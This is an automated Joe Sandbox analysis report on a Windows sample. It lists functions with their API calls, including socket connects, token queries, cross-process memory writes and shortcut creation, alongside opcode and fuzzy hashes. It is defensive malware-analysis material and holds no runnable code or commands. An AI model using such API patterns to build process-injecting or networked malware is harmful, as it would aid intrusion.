Part of subcall function 002250E6: _wcsncpy.LIBCMT ref: 002250FA

GetFileAttributesW.KERNEL32(?,?,?,?,002660C3), ref: 00266369
GetLastError.KERNEL32(?,?,?,002660C3), ref: 00266374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002660C3), ref: 00266388
_wcsrchr.LIBCMT ref: 002663AA

Part of subcall function 00266318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002660C3), ref: 002663E0

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 76d4286b02eabd9afe7e3eeaabfaa8f0e133e5b596208111ceff77aba5750888
Instruction ID: fa146186f444959cb0655ca81399bb33714fb40acba8e37f3e9824390d2ebc7c
Opcode Fuzzy Hash: 76d4286b02eabd9afe7e3eeaabfaa8f0e133e5b596208111ceff77aba5750888
Instruction Fuzzy Hash: E421F6319342169BDB15AA74AD4AFEA336CAF06B60F5000A6F406D7281EEA099F48E55

Function 00278B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0027A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0027A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00278BD3
WSAGetLastError.WSOCK32(00000000), ref: 00278BE2
connect.WSOCK32(00000000,?,00000010), ref: 00278BFE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 06bec26e58bf820280346e7133ea20051bf6f56041b5128886b08471302ff160
Instruction ID: 3de8105ac41b95a71f988f1a960eff5214ba3fec12fc9ff794f16435284c0ad5
Opcode Fuzzy Hash: 06bec26e58bf820280346e7133ea20051bf6f56041b5128886b08471302ff160
Instruction Fuzzy Hash: 5221C3312502149FCB14AF68DC49B7E77A9AF49710F04844AF9469B2D2CF74AC118B51

Function 00278420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00278441
GetForegroundWindow.USER32 ref: 00278458
GetDC.USER32(00000000), ref: 00278494
GetPixel.GDI32(00000000,?,00000003), ref: 002784A0
ReleaseDC.USER32(00000000,00000003), ref: 002784DB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: dd937e741c8aa0f12ec23f0924ac7d16deebd255530ccab8fb18b2210b92ffe1
Instruction ID: c9611373633c5caf87d25caee0b32dd77bed40d78f18306ce767b13c063f459f
Opcode Fuzzy Hash: dd937e741c8aa0f12ec23f0924ac7d16deebd255530ccab8fb18b2210b92ffe1
Instruction Fuzzy Hash: A3219F75A10214AFD700DFA4E888AAEBBE9EF49701F04C479E85AD7651CE70AC44CB60

Function 0023AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0023AFE3
SelectObject.GDI32(?,00000000), ref: 0023AFF2
BeginPath.GDI32(?), ref: 0023B009
SelectObject.GDI32(?,00000000), ref: 0023B033

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 97d9573c23949386b5e795967b5b33f4f2b6ada602a20281a70e3facb5b1aa17
Instruction ID: 5caaf4217569dc64963fc92b861c01ae0d27af004629995d3fbf1c667b0ca9bc
Opcode Fuzzy Hash: 97d9573c23949386b5e795967b5b33f4f2b6ada602a20281a70e3facb5b1aa17
Instruction Fuzzy Hash: C821AFB0810386EFDB11DF55FC8C7AA7B6CBB11355F14432AE5259A1A0C37199B1CF90

Function 0024217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 002421A9
CreateThread.KERNEL32(?,?,002422DF,00000000,?,?), ref: 002421ED
GetLastError.KERNEL32 ref: 002421F7
_free.LIBCMT ref: 00242200
__dosmaperr.LIBCMT ref: 0024220B

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 94273e79347792c256b50109e0463e89702b871544a80d8ef045ab09f5b11dae
Instruction ID: 4e49d8c3ec4bf86d59a4ca35a7c901bf282ae1e5a09ca1054382c30b748e5c6d
Opcode Fuzzy Hash: 94273e79347792c256b50109e0463e89702b871544a80d8ef045ab09f5b11dae
Instruction Fuzzy Hash: A7110832124357EF9B19EFA6EC41DAB7799EF05770B100429FD2886142DBB1D8318EA1

Function 0025ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0025ABD7
GetLastError.KERNEL32(?,0025A69F,?,?,?), ref: 0025ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0025A69F,?,?,?), ref: 0025ABF0
HeapAlloc.KERNEL32(00000000,?,0025A69F,?,?,?), ref: 0025ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0025AC0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: dbb4a640e1f8c8c340fbc993444f90d53809c19c74c5886af05b7d8b203ab752
Instruction ID: 8fb0235ee22195ca9056c54ba13e2ebbfb7309351b4eff748f9550d571c18175
Opcode Fuzzy Hash: dbb4a640e1f8c8c340fbc993444f90d53809c19c74c5886af05b7d8b203ab752
Instruction Fuzzy Hash: 4A018C70210205BFDB104FA9EC4DDAB3BACEF8A756710052AF80AC3260DA71CC54CF64

Function 00267A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00267A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00267A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00267A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00267A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00267AD0

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 6b5dfa080ea035bd419c755ba2cfdae4f3d757c68af4d267db6d9788b8824445
Instruction ID: bd0786e19b80cc30773210dbf12f1e25b50d091126692a59c368e4a9db3b59d0
Opcode Fuzzy Hash: 6b5dfa080ea035bd419c755ba2cfdae4f3d757c68af4d267db6d9788b8824445
Instruction Fuzzy Hash: 28011731C14619EBDF00AFE5E84CADDBB78FB09715F000455E502B2290DF309AA48BA1

Function 00259ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00259ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00259AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00259B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00259B15
CLSIDFromString.OLE32(?,?), ref: 00259B21

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 53bd7c2a521ad4905de65cc1e0c73c96d8b2185d45a86fa481762ca906e61268
Instruction ID: 3df4f02e81cb5916d57a1e82e927aa2d26a44707e0eb65928e7f4d899fe11e03
Opcode Fuzzy Hash: 53bd7c2a521ad4905de65cc1e0c73c96d8b2185d45a86fa481762ca906e61268
Instruction Fuzzy Hash: 0E018F76610205FFEB108F58EC48B9ABBEDEB45756F144024FD06D2210DB74DD999BA0

Function 0025AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0025AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0025AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0025AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0025AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0025AAAF

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7ed908b554a05304d98c9eef67b66adaba494e68f768d0853987b708dcb99b7d
Instruction ID: d97483d5af17261c166718989ada9387254ca753425143ad48e1fdb8a29edfa2
Opcode Fuzzy Hash: 7ed908b554a05304d98c9eef67b66adaba494e68f768d0853987b708dcb99b7d
Instruction Fuzzy Hash: B9F0A935201209AFEB101FA4AC8EEAB3BBCFF4A755F000129F906C71A0DB709C15CA61

Function 0025AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0025AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0025AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0025AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0025AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0025AB10

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 958b46881340431c0d08939726ae4719061b94e1c845fc9520e265211510d2d3
Instruction ID: c6ae96bbf64b0baf0574cee8239d67f81f8ff502b2c1c9f71b6825c4c3253a64
Opcode Fuzzy Hash: 958b46881340431c0d08939726ae4719061b94e1c845fc9520e265211510d2d3
Instruction Fuzzy Hash: 6CF04975250209AFEB110FA4FC89EAB3BADFF4A759F000129F946C7190DA7098168AB1

Function 0025EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0025EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0025ECAB
MessageBeep.USER32(00000000), ref: 0025ECC3
KillTimer.USER32(?,0000040A), ref: 0025ECDF
EndDialog.USER32(?,00000001), ref: 0025ECF9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: f7aafb503b437bff390b49c602d18e1806a1326894fc60f657894d97ba6f6a8a
Instruction ID: 4779995c8e97394380e83eda9c6c2b33547c37834fee8bbb3e1e37986ef32491
Opcode Fuzzy Hash: f7aafb503b437bff390b49c602d18e1806a1326894fc60f657894d97ba6f6a8a
Instruction Fuzzy Hash: D501D130910715ABEF285F10EE4EB9677B8FB00B07F01055AB993A18E0DBF0AA58CB44

Function 0023B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0023B0BA
StrokeAndFillPath.GDI32(?,?,0029E680,00000000,?,?,?), ref: 0023B0D6
SelectObject.GDI32(?,00000000), ref: 0023B0E9
DeleteObject.GDI32 ref: 0023B0FC
StrokePath.GDI32(?), ref: 0023B117

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: fa39461b676a7c33efaf9468c311d021cbae205a5ca86376491d5ffc6ce63697
Instruction ID: 99b3fdf3ca77f34638887344376dec4b00737b903dedc4e9e9bf7bd48b0bd406
Opcode Fuzzy Hash: fa39461b676a7c33efaf9468c311d021cbae205a5ca86376491d5ffc6ce63697
Instruction Fuzzy Hash: D2F04FB0050285EFCB229F65FC4C7993F68A702362F088325F56A484F0CB318A76DF10

Function 0026F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0026F2DA
CoCreateInstance.OLE32(002ADA7C,00000000,00000001,002AD8EC,?), ref: 0026F2F2
CoUninitialize.OLE32 ref: 0026F555

Strings

.lnk, xrefs: 0026F28B, 0026F290, 0026F29E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 6472de2bb807681415b6bcba3c8754808345bd6cb808b036c3859c7796e4bb01
Instruction ID: 83fa008b3197331de5017582fd123cb55bdca011714579134bf1dc42b517e0ab
Opcode Fuzzy Hash: 6472de2bb807681415b6bcba3c8754808345bd6cb808b036c3859c7796e4bb01
Instruction Fuzzy Hash: FEA15AB1124301AFD700EFA4D881EAFB7A8EF98704F10491DF15697192EB70EA59CB52

Function 0026E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0022660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002253B1,?,?,002261FF,?,00000000,00000001,00000000), ref: 0022662F

CoInitialize.OLE32(00000000), ref: 0026E85D
CoCreateInstance.OLE32(002ADA7C,00000000,00000001,002AD8EC,?), ref: 0026E876
CoUninitialize.OLE32 ref: 0026E893

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

Strings

.lnk, xrefs: 0026E83B, 0026E84D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 49e6a6f14e4b409ccef055c906f8d73e95341a730671130f66a446463f9c094f
Instruction ID: a17368d1fb8b61bf7c1536ac8971594f39062d86878b7dedeedc20d64621a86d
Opcode Fuzzy Hash: 49e6a6f14e4b409ccef055c906f8d73e95341a730671130f66a446463f9c094f
Instruction Fuzzy Hash: CAA16539614311AFCB10DF54C48492EBBE5BF89310F158988F9969B3A1CB31EC95CF81

Function 0024325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002432ED

Part of subcall function 0024E0D0: __87except.LIBCMT ref: 0024E10B

Strings

pow, xrefs: 002432C5, 002432E2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0c83f7c594616b6bb4e843a2570f79b69f0a83fdc0875219d26e49a340920d1d
Instruction ID: 07caefaef051a80489bbfa9b0be68330c35d3ad04077c2c480b63ea7eea83b16
Opcode Fuzzy Hash: 0c83f7c594616b6bb4e843a2570f79b69f0a83fdc0875219d26e49a340920d1d
Instruction Fuzzy Hash: C6515E21A3820396EF1DFF14D94537A3B94BB40710F344D59E8D9861A9DFB48DB89A81

Function 00264606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,002BDC50,?,0000000F,0000000C,00000016,002BDC50,?), ref: 00264645

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 002646C5

Strings

REMOVE, xrefs: 00264676
THIS, xrefs: 00264703

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: f6f55674f298fc4e6668e87cad0e2d449d1fac4b3f5ce88a930732e7527df3e5
Instruction ID: aaa7246da9e531ba2d0eeb282d430cb85bda5892ef805eafd3f5f7b5c70ae128
Opcode Fuzzy Hash: f6f55674f298fc4e6668e87cad0e2d449d1fac4b3f5ce88a930732e7527df3e5
Instruction Fuzzy Hash: FD41E834A2021A9FCF05EF94D881AADB7B4FF45304F148069E956AB391DB30DDA5CF40

Function 0025C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0026430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0025BC08,?,?,00000034,00000800,?,00000034), ref: 00264335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0025C1D3

Part of subcall function 002642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0025BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00264300

Part of subcall function 0026422F: GetWindowThreadProcessId.USER32(?,?), ref: 0026425A
Part of subcall function 0026422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0025BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0026426A
Part of subcall function 0026422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0025BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00264280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0025C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0025C28D

Strings

@, xrefs: 0025C2A5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
